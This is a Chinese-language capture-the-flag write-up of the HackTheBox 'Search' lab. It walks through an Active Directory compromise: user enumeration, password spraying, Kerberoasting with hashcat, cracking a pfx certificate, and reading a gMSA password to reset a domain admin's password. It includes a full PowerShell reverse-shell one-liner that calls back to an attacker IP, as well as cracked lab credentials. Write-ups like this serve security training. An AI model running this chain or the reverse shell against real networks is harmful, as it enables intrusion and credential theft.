title: HackTheBox-Search author: Mosaic Theory layout: true categories: 漏洞实验 tags:
• 打靶日记
Recon:
Nmap scan report for 10.10.11.129
Host is up (0.17s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
8172/tcp open unknown
9389/tcp open adws
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49702/tcp open unknown
49716/tcp open unknownsudo nmap -sC -sV -Pn -T4 -oA nmap.txt -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,8172,9389 10.10.11.129Nmap scan report for 10.10.11.129
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Search — Just Testing IIS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-22 09:32:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:11+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-05-22T09:34:11+00:00; 0s from scanner time.
|_http-title: Search — Just Testing IIS
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:10+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:10+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-05-22T09:34:10+00:00; 0s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2022-05-22T09:34:10+00:00; 0s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-05-22T09:33:32
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.65 seconds>> whatweb http://10.10.11.129
http://10.10.11.129 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[youremail@search.htb], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.11.129], JQuery[3.3.1], Microsoft-IIS[10.0], Script, Title[Search — Just Testing IIS], X-Powered-By[ASP.NET]80 port:
有很多的按钮,但都是锚点,在页面还会有一些人员信息:
>> cat username.txt
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart>> ./namemash.py username.txt > newname.txt
>> cat newname.txt
keelylyons
lyonskeely
keely.lyons
lyons.keely
lyonsk
..........................页面还会有一张图片:
“Send password to Hope Sharp” “IsolationIsKey?”,不知会不会与目标有关。目录爆破没什么东西,443端口与80端口一样。
kerberos:
>> kerbrute userenum -d search.htb ./newname.txt --dc 10.10.11.129
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/22/22 - Ronnie Flathers @ropnop
2022/05/22 18:24:58 > Using KDC(s):
2022/05/22 18:24:58 > 10.10.11.129:88
2022/05/22 18:24:58 > [+] VALID USERNAME: keely.lyons@search.htb
2022/05/22 18:24:58 > [+] VALID USERNAME: dax.santiago@search.htb
2022/05/22 18:24:58 > [+] VALID USERNAME: sierra.frye@search.htb
2022/05/22 18:25:01 > [+] VALID USERNAME: hope.sharp@search.htb
2022/05/22 18:25:01 > Done! Tested 90 usernames (4 valid) in 3.259 seconds看起来目标的命令规范是 name.surname@search.htb,我试着与刚刚图片中的密码字符串进行喷洒枚举:
>> crackmapexec smb 10.10.11.129 -u username.txt -p IsolationIsKey? --continue-on-success
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\keely.lyons:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\dax.santiago:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sierra.frye:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey? 有一个是认证成功的,但目标没有开winrm,但是对有一个共享目录有写入权限:
>> smbmap -u hope.sharp -p IsolationIsKey? -H 10.10.11.129
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share 其中有一堆的用户目录:
>> smbclient //10.10.11.129/RedirectedFolders$ -U hope.sharp
Password for [WORKGROUP\hope.sharp]:
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Sun May 22 18:38:33 2022
.. Dc 0 Sun May 22 18:38:33 2022
abril.suarez Dc 0 Wed Apr 8 02:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 21:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 20:35:32 2020
belen.compton Dc 0 Wed Apr 8 02:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 20:37:36 2020
chanel.bell Dc 0 Wed Apr 8 02:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 21:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 20:02:04 2020
dax.santiago Dc 0 Wed Apr 8 02:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 19:55:34 2020
edgar.jacobs Dc 0 Fri Apr 10 04:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 20:39:50 2020
eve.galvan Dc 0 Wed Apr 8 02:23:13 2020
frederick.cuevas Dc 0 Wed Apr 8 02:29:22 2020
hope.sharp Dc 0 Thu Apr 9 22:34:41 2020
jayla.roberts Dc 0 Wed Apr 8 02:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 21:01:06 2020
payton.harmon Dc 0 Fri Apr 10 04:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 19:44:32 2020
santino.benjamin Dc 0 Wed Apr 8 02:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 20:21:42 2020
sierra.frye Dc 0 Thu Nov 18 09:01:46 2021
trace.ryan Dc 0 Fri Apr 10 04:14:26 2020
3246079 blocks of size 4096. 579883 blocks available
smb: \> cd chanel.bell\
smb: \chanel.bell\> ls
. Dc 0 Wed Apr 8 02:15:09 2020
.. Dc 0 Wed Apr 8 02:15:09 2020
Desktop DRc 0 Wed Apr 8 02:17:23 2020
Documents DRc 0 Wed Apr 8 02:17:25 2020
Downloads DRc 0 Wed Apr 8 02:17:24 2020
3246079 blocks of size 4096. 579883 blocks available对他们的目录都没有权限,但我还是放了个SCF文件进去:
smb: \Angie.Duffy\Desktop\> put user.scf
NT_STATUS_ACCESS_DENIED opening remote file \Angie.Duffy\Desktop\user.scf
smb: \Angie.Duffy\Desktop\> cd ..
smb: \Angie.Duffy\> cd ..
smb: \> put user.scf
putting file user.scf as \user.scf (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. Dc 0 Sun May 22 18:45:17 2022
.. Dc 0 Sun May 22 18:45:17 2022
abril.suarez Dc 0 Wed Apr 8 02:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 21:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 20:35:32 2020
trace.ryan Dc 0 Fri Apr 10 04:14:26 2020
user.scf Ac 88 Sun May 22 18:45:17 2022不过既然已经有信用认证了,还是能够搜集一些域内信息:
>> bloodhound-python --zip -c All -d SEARCH.htb -u hope.sharp -p IsolationIsKey? -ns 10.10.11.129
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 107 users
INFO: Found 64 groups
INFO: Found 0 trusts
INFO: Done in 00M 57S
INFO: Compressing output into 20220522194601_bloodhound.zip但可惜,能收集的信息几乎没有。不过点击bloodhound预查询“List all Kerberoastable Accounts”,会看到两个服务账户,其中有一个WEB_SVC账户:
kerberosting:
我可以用hope.sharp身份去请求WEB_SVC的TGS票据:
>> GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/hope.sharp -outputfile web_svc.hash
/usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: 1.16.0-unknown is an invalid version and will not be supported in a future release
warnings.warn(
/usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: 1.12.1-git20200711.33e2d80-dfsg1-0.6 is an invalid version and will not be supported in a future release
warnings.warn(
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 20:59:11.329031
[-] CCache file is not found. Skipping... 是处于TGS-REP阶段的票据,对应的13100:
>> hashcat -h | grep "TGS-REP"
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
>> hashcat -m 13100 web_svc.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$337dfb5b4eeb1c54fdc0998e728b5fd3$062ec46e51aa41977e549c3e4f209f74dc80c8c3f43d5aa962d6176b406b8708aa4f77c823069aa7484e1fea8c40ce2a02bf5d7368f072850379a38f2e0863e65d724ba....................
6356457366e1a78a54d6ed65ac38c9d091d8b67d607286a02eb4ff72bffff6f4c586976ec66d581d5273c0e03de726ab2aa0afb9b70a3126a440926f44ade3fbc7f5cccac8afddf0ee6001e1f532005954201fb591a5ff422f326b9a025579996a5:@3ONEmillionbaby它是有效的:
>> crackmapexec smb 10.10.11.129 -u web_svc -p @3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\web_svc:@3ONEmillionbaby 但是它并没有什么新东西:
>> smbmap -H 10.10.11.129 -u web_svc -p @3ONEmillionbaby
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share 密码喷涂:
我可以用刚刚在共享中看到了更多用户:
>> kerbrute userenum -d search.htb ./username.txt --dc 10.10.11.129
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/22/22 - Ronnie Flathers @ropnop
2022/05/22 20:13:03 > Using KDC(s):
2022/05/22 20:13:03 > 10.10.11.129:88
2022/05/22 20:13:03 > [+] VALID USERNAME: abril.suarez@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: chanel.bell@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: cameron.melendez@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: belen.compton@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: angie.duffy@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: antony.russo@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: claudia.pugh@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: cortez.hickman@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: eddie.stevens@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: dax.santiago@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: edith.walls@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: frederick.cuevas@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: hope.sharp@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: edgar.jacobs@search.htb
2022/05/22 20:13:03 > [+] VALID USERNAME: eve.galvan@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: jayla.roberts@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: jordan.gregory@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: sierra.frye@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: savanah.velazquez@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: reginald.morton@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: santino.benjamin@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: payton.harmon@search.htb
2022/05/22 20:13:04 > [+] VALID USERNAME: trace.ryan@search.htb
2022/05/22 20:13:04 > Done! Tested 23 usernames (23 valid) in 0.918 seconds>> crackmapexec smb 10.10.11.129 -u username.txt -p passwd.txt --continue-on-success | grep "[+]"
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey? 它多了些东西,不过是空的:
>> smbmap -H 10.10.11.129 -u edgar.jacobs -p @3ONEmillionbaby
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
>> smbclient //10.10.11.129/helpdesk -U edgar.jacobs
Password for [WORKGROUP\edgar.jacobs]:
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Tue Apr 14 18:24:23 2020
.. Dc 0 Tue Apr 14 18:24:23 2020
3246079 blocks of size 4096. 581884 blocks available也无法移动上去:
>> psexec.py -hashes '92b9467a379658c07e2341b45a090a3c:92b9467a379658c07e2341b45a090a3c' 'search/edgar.jacobs@10.10.11.129'
/usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: 1.16.0-unknown is an invalid version and will not be supported in a future release
warnings.warn(
/usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: 1.12.1-git20200711.33e2d80-dfsg1-0.6 is an invalid version and will not be supported in a future release
warnings.warn(
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.11.129.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'CertEnroll' is not writable.
[-] share 'helpdesk' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share RedirectedFolders$
[*] Uploading file cQzBhSYX.exe
[*] Opening SVCManager on 10.10.11.129.....
[-] Error opening SVCManager on 10.10.11.129.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager最后在桌面发现一些东西:
smb: \edgar.jacobs\Desktop\> ls
. DRc 0 Mon Aug 10 18:02:16 2020
.. DRc 0 Mon Aug 10 18:02:16 2020
$RECYCLE.BIN DHSc 0 Fri Apr 10 04:05:29 2020
desktop.ini AHSc 282 Mon Aug 10 18:02:16 2020
Microsoft Edge.lnk Ac 1450 Fri Apr 10 04:05:03 2020
Phishing_Attempt.xlsx Ac 23130 Mon Aug 10 18:35:44 2020
3246079 blocks of size 4096. 581611 blocks available
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx 这里看起来像是有个C列,但是我拉不出来,在拉的时候还弹出个提示:
尝试了两个密码。没成功:
我试着在Google搜寻了一番,这种保护它并不是保护数据的,并不对数据进行任何加密,它只是单纯的保护数据不被篡改,我可以把它改成zip格式的,再解压出其中的xml:
在xl\worksheets目录下,会有sheet.xml,它便记录着保护的配置信息:
我可以将其删除,然后将文件重新归档zip再把后缀名改为xlsx:
>> crackmapexec smb 10.10.11.129 -u username.txt -p passwd.txt --no-bruteforce --continue-on-success | grep "[+]"
"class": algorithms.Blowfish,
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Margaret.Robinson://51+mountain+DEAR+noise+83// STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Scarlett.Parks:++47|building|WARSAW|gave|60++ STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 有一个可以用:
>> smbmap -H 10.10.11.129 -u Sierra.Frye -p '$$49=wide=STRAIGHT=jordan=28$$18'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
还是没什么东西,不过在当前用户的桌面可以看到user.txt:
smb: \sierra.frye\Desktop\> ls
. DRc 0 Thu Nov 18 09:08:00 2021
.. DRc 0 Thu Nov 18 09:08:00 2021
$RECYCLE.BIN DHSc 0 Wed Apr 8 02:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 22:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 20:28:05 2020
user.txt Ac 33 Thu Nov 18 08:55:27 2021
3246079 blocks of size 4096. 581346 blocks available
smb: \sierra.frye\Desktop\> 在备份目录中会有一本证书:
smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Tue Aug 11 04:39:17 2020
.. DHc 0 Tue Aug 11 04:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 23:04:11 2020
staff.pfx Ac 4326 Tue Aug 11 04:39:17 2020
3246079 blocks of size 4096. 581342 blocks available
smb: \sierra.frye\Downloads\Backups\> get staff.pfx 我想起有些HTTPS服务被403拒绝了,或许可以用证书去试试:
>> pfx2john staff.pfx > staff.pfx.hash
>> john staff.pfx.hash -w=/usr/share/wordlists/rockyou.txt
Created directory: /home/mosaic/.john
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy (staff.pfx)
1g 0:00:01:46 DONE (2022-05-22 21:48) 0.009372g/s 51401p/s 51401c/s 51401C/s misssnamy..missnono
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 会出现个登录框,输入sierra.frye的密码会出现个伪powershell终端:
PS C:\Users\Sierra.Frye\Documents>
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.4",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..
65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIE
ncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path
+ "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.F
lush()};$client.Close()
At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient("10.10.16.4",1337); ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\Sierra.Frye\Documents> 有杀软。
ReadGMSAPassword权限:
再进行一次bloodhound可以抓到更多信息:
我可以先检索COVID.SEARCH.HTB 的密码,然后改掉域管理组用户Tristan.Davies的密码:
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $mp = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> ConvertFrom-ADManagedPasswordBlob $mp
Version : 1
CurrentPassword : ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑᳡扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾେ͍롤
ᒛ�䬁ማ譿녓鏶᪺骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword : System.Security.SecureString
PreviousPassword :
SecurePreviousPassword :
QueryPasswordInterval : 2876.09:21:31.4918812
UnchangedPasswordInterval : 2876.09:16:31.4918812
PS C:\Users\Sierra.Frye\Documents> 将它保存到一个变量里:
PS C:\Users\Sierra.Frye\Documents> (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑᳡扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾେ͍롤ᒛ�䬁ማ譿녓鏶᪺骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱
茾蒚⟒澽座걍盡篇
PS C:\Users\Sierra.Frye\Documents> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
PS C:\Users\Sierra.Frye\Documents> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents> 重置tristan.davies账户密码:
PS C:\Users\Sierra.Frye\Documents> (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑᳡扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾେ͍롤ᒛ�䬁ማ譿녓鏶᪺骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱
茾蒚⟒澽座걍盡篇
PS C:\Users\Sierra.Frye\Documents> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
PS C:\Users\Sierra.Frye\Documents> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential BIR-ADFS-GMSA, $SecPass
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity tristan.davies -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'whoamiWHOAMI!' -force)} -Credential $cred
PS C:\Users\Sierra.Frye\Documents> >> crackmapexec smb 10.10.11.129 -u tristan.davies -p 'whoamiWHOAMI!'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\tristan.davies:whoamiWHOAMI! (Pwn3d!>> wmiexec.py 'search/tristan.davies:whoamiWHOAMI!@10.10.11.129'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\tristan.davies
C:\Users\Administrator\desktop>type root.txt
acb........................................